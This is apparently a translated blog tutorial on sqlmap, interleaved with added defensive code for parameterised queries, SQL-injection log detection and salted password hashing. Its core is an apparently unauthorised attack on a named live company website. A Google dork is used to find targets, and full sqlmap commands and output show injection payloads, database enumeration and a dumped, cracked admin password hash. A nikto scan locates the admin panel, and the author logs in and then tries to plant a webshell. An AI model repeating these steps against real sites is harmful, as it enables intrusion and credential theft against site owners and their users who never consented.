An introductory example of using sqlmap

Posted by Zss on:


The rough approach is: find an injection point, try injecting with sqlmap, enumerate the database name, table names, column names and column values, then find the admin URL.

I roughly understand sqlmap's injection workflow: it automatically assembles various SQL statements, passes them as parameter values to build a URL, and sends the request. The exact SQL can be seen with -v 5, but for now I can't make sense of it.
In fact, if you know how to write SQL injection statements, you could build the injection yourself in Python or inject by hand, which gives a lot more flexibility.

I used Google to search for some sites with injection flaws, purely to find an easy target; sadly, they all ended in failure...
Search with Google hacking syntax: 公司inurl:".php?id="   i.e. pages whose text ends with 公司 ("company") and whose URL contains .php?id=

Then test whether an injection point exists in the simplest way: append a ' after id= and see whether the page throws an error.
id is usually an integer type, so passing it a ' easily causes an error; because the parameter isn't validated at all, there is an injection point.
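Here is an added example (an editorial addition, not the author's code) of what the ' test above is actually probing. It uses an in-memory SQLite table standing in for the site's content table (constructed data; the table and column names are assumptions) and places the unvalidated query beside a hardened version that rejects anything other than a decimal integer and binds the value as a parameter. Through the vulnerable function, the quote produces the database error the author looks for and the page's own `AND 2853=2853` probe is accepted silently; the hardened function refuses both before any SQL is built.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the site's content table (names are assumptions)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE about (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO about VALUES (?, ?)",
                     [(36, "History"), (37, "Contact")])
    return conn


def lookup_vulnerable(conn, raw_id):
    """The pattern behind about.php?id=: the raw parameter is pasted into the SQL text.
    A stray quote breaks the statement (the error the author looks for) and an
    appended condition such as `AND 2853=2853` is executed as SQL."""
    sql = "SELECT title FROM about WHERE id=" + raw_id
    return [row[0] for row in conn.execute(sql)]


# Strict ASCII digits; str.isdigit() would also accept characters such as '³'.
INT_RE = re.compile(r"[0-9]+")


def lookup_hardened(conn, raw_id):
    """Validate the type the parameter is supposed to have, then bind it.
    Anything that is not a plain decimal integer is rejected before SQL is built;
    the `?` placeholder means the value can never be interpreted as SQL."""
    if not INT_RE.fullmatch(raw_id):
        raise ValueError("id must be a decimal integer")
    return [row[0] for row in conn.execute(
        "SELECT title FROM about WHERE id=?", (int(raw_id),))]


def probe(func, conn, raw_id):
    """Run one lookup and report the outcome as a string, for the demo below."""
    try:
        return "rows=" + repr(func(conn, raw_id))
    except sqlite3.OperationalError as e:
        # What a trailing quote triggers when the id is not validated.
        return "db error: " + str(e)
    except ValueError as e:
        return "rejected: " + str(e)


if __name__ == "__main__":
    db = make_db()
    for raw in ["37", "37'", "37 AND 2853=2853"]:
        print(f"id={raw!r:22} vulnerable -> {probe(lookup_vulnerable, db, raw)}")
        print(f"id={raw!r:22} hardened   -> {probe(lookup_hardened, db, raw)}")
```

The hardening is two independent layers: type validation stops malformed input at the edge, and parameter binding guarantees that even a value which passes validation is sent as data, never as SQL text.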

I looked at a lot of sites and many of them behaved this way, but for some reason sqlmap failed on most of them; in the end one of them did give up an account and password, which wasn't easy.

1. python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 --dbs --delay 0.5
--delay sets a 0.5 second delay between requests; before I set it my IP got banned right away and I couldn't test any further. --dbs enumerates the database names, and --dbms "mysql" specifies the database type.

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 --dbs --delay 0.5
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:10:16 /2019-05-28/

[16:10:16] [INFO] resuming back-end DBMS 'mysql'
[16:10:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:10:17] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:10:17] [INFO] fetching database names
[16:10:17] [INFO] used SQL query returns 2 entries
[16:10:17] [INFO] resumed: 'information_schema'
[16:10:17] [INFO] resumed: 'bdm266490221_db'
available databases [2]:
[*] bdm266490221_db
[*] information_schema

[16:10:17] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:10:17 /2019-05-28/

So two database names were found:
available databases [2]:
[*] bdm266490221_db
[*] information_schema
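The IP ban the author ran into before adding --delay is the other side of this exchange. As an added example (not from the original post), the script below parses a few constructed Apache access log lines, decodes the query string and flags the request shapes visible in the sqlmap session output above: an unbalanced quote, a boolean tautology, a SLEEP() call, a UNION SELECT, and the default sqlmap User-Agent. The IP addresses, timestamps and log lines are constructed; the signature list is a starting point for a detection rule, not a complete WAF.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access log lines (Apache combined format), not real traffic.
SAMPLE_LOG = """\
203.0.113.9 - - [28/May/2019:16:10:16 +0800] "GET /about.php?id=37 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [28/May/2019:16:10:17 +0800] "GET /about.php?id=37' HTTP/1.1" 500 312 "-" "Mozilla/5.0"
203.0.113.9 - - [28/May/2019:16:10:18 +0800] "GET /about.php?id=37%20AND%202853%3D2853 HTTP/1.1" 200 5123 "-" "sqlmap/1.3.5.142#dev (http://sqlmap.org)"
203.0.113.9 - - [28/May/2019:16:10:19 +0800] "GET /about.php?id=37%20AND%20%28SELECT%209801%20FROM%20%28SELECT%28SLEEP%285%29%29%29IFdc%29 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
203.0.113.9 - - [28/May/2019:16:10:20 +0800] "GET /about.php?id=-7839%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x716b626271%29--%20adQR HTTP/1.1" 200 4100 "-" "Mozilla/5.0"
198.51.100.4 - - [28/May/2019:16:11:00 +0800] "GET /about.php?id=36 HTTP/1.1" 200 4988 "-" "Mozilla/5.0"
"""

# Apache combined log format: ip ident user [time] "method path proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Each signature corresponds to one injection type in the sqlmap session output.
SIGNATURES = [
    ("union-select", re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("time-based", re.compile(r"\b(sleep|benchmark)\s*\(", re.I)),
    ("boolean-tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+", re.I)),
]


def classify_request(path, ua):
    """Return the list of reasons a request looks like SQL injection probing (empty if clean)."""
    reasons = []
    query = path.partition("?")[2]
    decoded = unquote_plus(query)          # inspect the decoded form, not the raw URL
    if "sqlmap" in ua.lower():
        reasons.append("sqlmap-user-agent")  # default UA, trivially changed, still worth logging
    for name, pattern in SIGNATURES:
        if pattern.search(decoded):
            reasons.append(name)
    # An odd number of single quotes is the classic manual ' probe.
    if decoded.count("'") % 2 == 1:
        reasons.append("unbalanced-quote")
    return reasons


def scan_log(text):
    """Parse every line; return (ip, path, reasons) for each flagged request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m["path"], m["ua"])
        if reasons:
            findings.append((m["ip"], m["path"], reasons))
    return findings


def suspicious_ips(text, threshold=3):
    """IPs with at least `threshold` flagged requests: candidates for rate limiting
    or a temporary block, which is what stopped the author's first run."""
    counts = {}
    for ip, _, _ in scan_log(text):
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for ip, path, reasons in scan_log(SAMPLE_LOG):
        print(ip, path, ", ".join(reasons))
    print("block candidates:", suspicious_ips(SAMPLE_LOG))
```

Decoding before matching matters: the payloads arrive percent-encoded, so a rule applied to the raw request line would miss every one of them except the bare quote.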

2. Next try to enumerate the table names; now that we know the database name, specify it directly
python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db --tables --delay 0.5
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.3.5.142#dev}
|_ -| . ["]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:12:48 /2019-05-28/

[16:12:48] [INFO] resuming back-end DBMS 'mysql'
[16:12:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:12:49] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:12:49] [INFO] fetching tables for database: 'bdm266490221_db'
[16:12:49] [INFO] used SQL query returns 9 entries
[16:12:49] [INFO] resumed: 'gplat_book'
[16:12:49] [INFO] resumed: 'gplat_news'
[16:12:49] [INFO] resumed: 'gplat_newsclass'
[16:12:49] [INFO] resumed: 'gplat_newsclass2'
[16:12:49] [INFO] resumed: 'href'
[16:12:49] [INFO] resumed: 'job'
[16:12:49] [INFO] resumed: 'job_add'
[16:12:49] [INFO] resumed: 'lawyer_wenda'
[16:12:49] [INFO] resumed: 'user'
Database: bdm266490221_db
[9 tables]
+------------------+
| user             |
| gplat_book       |
| gplat_news       |
| gplat_newsclass  |
| gplat_newsclass2 |
| href             |
| job              |
| job_add          |
| lawyer_wenda     |
+------------------+

[16:12:49] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:12:49 /2019-05-28/
9 table names came out; judging by the names, it should be the user table

3. Enumerate the columns
python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5

[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db -T user --columns --delay 0.5
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [,]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:15:39 /2019-05-28/

[16:15:39] [INFO] resuming back-end DBMS 'mysql'
[16:15:39] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:15:40] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:15:40] [INFO] fetching columns for table 'user' in database 'bdm266490221_db'
[16:15:40] [INFO] used SQL query returns 13 entries
[16:15:40] [INFO] resumed: 'id','int(6)'
[16:15:40] [INFO] resumed: 'name','varchar(60)'
[16:15:40] [INFO] resumed: 'pass','varchar(60)'
[16:15:40] [INFO] resumed: 'email','varchar(60)'
[16:15:40] [INFO] resumed: 'phone','varchar(14)'
[16:15:40] [INFO] resumed: 'times','datetime'
[16:15:40] [INFO] resumed: 'up_time','datetime'
[16:15:40] [INFO] resumed: 'xingb','varchar(2)'
[16:15:40] [INFO] resumed: 'adder','varchar(8)'
[16:15:40] [INFO] resumed: 'qianming','varchar(100)'
[16:15:40] [INFO] resumed: 'image','varchar(70)'
[16:15:40] [INFO] resumed: 'grade','varchar(12)'
[16:15:40] [INFO] resumed: 'admin','int(2)'
Database: bdm266490221_db
Table: user
[13 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| adder    | varchar(8)   |
| admin    | int(2)       |
| email    | varchar(60)  |
| grade    | varchar(12)  |
| id       | int(6)       |
| image    | varchar(70)  |
| name     | varchar(60)  |
| pass     | varchar(60)  |
| phone    | varchar(14)  |
| qianming | varchar(100) |
| times    | datetime     |
| up_time  | datetime     |
| xingb    | varchar(2)   |
+----------+--------------+

[16:15:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:15:40 /2019-05-28/

4. Dump the contents; user and pass look like the account and password
[root@zss sqlmapproject-sqlmap-eb2e78b]# python sqlmap.py -u http://www.yuebooemt.com/about.php?id=37 -D bdm266490221_db -T user -C "user,pass" --dump --delay 0.5
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.3.5.142#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 16:18:43 /2019-05-28/

[16:18:43] [INFO] resuming back-end DBMS 'mysql'
[16:18:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=37 AND 2853=2853

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=37 AND (SELECT 9801 FROM (SELECT(SLEEP(5)))IFdc)

    Type: UNION query
    Title: Generic UNION query (NULL) - 25 columns
    Payload: id=-7839 UNION ALL SELECT NULL,CONCAT(0x716b626271,0x794e7268447971464a716d766c4a4857434650666d43506f6e497453704361734b4b586d47655950,0x7170717071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- adQR
---
[16:18:44] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.12
[16:18:44] [INFO] fetching entries of column(s) '`user`, pass' for table 'user' in database 'bdm266490221_db'
[16:18:44] [INFO] used SQL query returns 1 entry
[16:18:45] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[16:18:45] [INFO] fetching number of column(s) '`user`, pass' entries for table 'user' in database 'bdm266490221_db'
[16:18:45] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[16:18:45] [INFO] retrieved: 1
[16:18:48] [INFO] retrieved:
[16:18:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
[16:19:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions

[16:19:09] [INFO] retrieved: 4d9012b4a77a9524d675dad27c3276ab5705e5e8
[16:22:07] [INFO] recognized possible password hashes in column 'pass'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[16:22:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapvAfQDC24962/sqlmaphashes-9Y2NbI.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[16:22:45] [INFO] using hash method 'sha1_generic_passwd'
[16:22:45] [INFO] resuming password '123321' for hash '4d9012b4a77a9524d675dad27c3276ab5705e5e8'
Database: bdm266490221_db
Table: user
[1 entry]
+---------+---------------------------------------------------+
| user    | pass                                              |
+---------+---------------------------------------------------+
| <blank> | 4d9012b4a77a9524d675dad27c3276ab5705e5e8 (123321) |
+---------+---------------------------------------------------+

[16:22:45] [INFO] table 'bdm266490221_db.`user`' dumped to CSV file '/root/.sqlmap/output/www.yuebooemt.com/dump/bdm266490221_db/user.csv'
[16:22:45] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.yuebooemt.com'

[*] ending @ 16:22:45 /2019-05-28/

Because of network problems user wasn't dumped; earlier it came out as admin
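The dump above shows why that password fell in seconds: sqlmap recognised the value as sha1_generic_passwd, i.e. a bare unsalted SHA-1 of the password, so a six-digit string is a single wordlist lookup and every user with the same password has the same hash. As an added example (an editorial addition, not part of the original post) the code below shows the storage scheme a defender would replace it with: salted, iterated PBKDF2-HMAC-SHA256, constant-time comparison, and a verify-and-rehash path so legacy rows are upgraded the next time their owner logs in. The iteration count is an assumption to tune for your hardware; the hash from the dump is deliberately not reproduced here.

```python
import hashlib
import hmac
import os

# Assumed work factor for PBKDF2-HMAC-SHA256; raise it as hardware allows.
ITERATIONS = 600_000


def legacy_sha1(password):
    """The scheme the dump shows: sha1(password), no salt, one round.
    Deterministic, so identical passwords give identical hashes across users."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Salted, iterated hash. The stored string carries everything needed to verify it."""
    if salt is None:
        salt = os.urandom(16)          # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password, stored):
    """Check a password against either scheme, using a constant-time comparison."""
    if stored.startswith("pbkdf2_sha256$"):
        _, iters, salt_hex, dk_hex = stored.split("$")
        dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
        return hmac.compare_digest(dk.hex(), dk_hex)
    # Anything else is treated as a legacy row: 40 hex characters of unsalted SHA-1.
    return hmac.compare_digest(legacy_sha1(password), stored)


def verify_and_upgrade(password, stored):
    """Transparent migration: returns (ok, stored_value_to_keep).
    A correct login against a legacy hash yields a new PBKDF2 string to write back."""
    if not verify_password(password, stored):
        return False, stored
    if stored.startswith("pbkdf2_sha256$"):
        return True, stored
    return True, hash_password(password)


if __name__ == "__main__":
    # Constructed demo: two users who chose the same weak password.
    print("legacy, user A:", legacy_sha1("123321"))
    print("legacy, user B:", legacy_sha1("123321"), "(identical: no salt)")
    print("pbkdf2, user A:", hash_password("123321"))
    print("pbkdf2, user B:", hash_password("123321"), "(different salt, different hash)")
    ok, upgraded = verify_and_upgrade("123321", legacy_sha1("123321"))
    print("legacy login ok:", ok, "-> rewrite row as", upgraded[:40], "...")
```

The per-user salt removes the shared-hash problem, the iteration count turns a wordlist pass from instant into expensive, and compare_digest keeps the verification from leaking how many bytes matched.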

5. Since there's an account and password, there should be an admin URL; use nikto -h url to scan and see what information comes out
The scan turned up a path that might be the admin panel; I tried it and it is the admin URL. After logging in with the account and password, the next step is finding a way to get a webshell.
Still, you can't just go around doing damage; no wonder people say "learn pentesting well, sit in a cell till you're old".
root@MiWiFi-R3L-srv:~# nikto -h http://www.yuebooemt.com
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          60.205.33.134
+ Target Hostname:    www.yuebooemt.com
+ Target Port:        80
+ Start Time:         2019-05-28 16:24:58 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ Retrieved x-powered-by header: PHP/5.2.17
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Cookie PHPSESSID created without the httponly flag
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ ERROR: Error limit (20) reached for host, giving up. Last error: error reading HTTP response
+ Scan terminated:  20 error(s) and 12 item(s) reported on remote host
+ End Time:           2019-05-28 16:27:50 (GMT8) (172 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

6. Finally I wanted to upload a one-line shell through the upload feature to get a webshell, but I never found a way.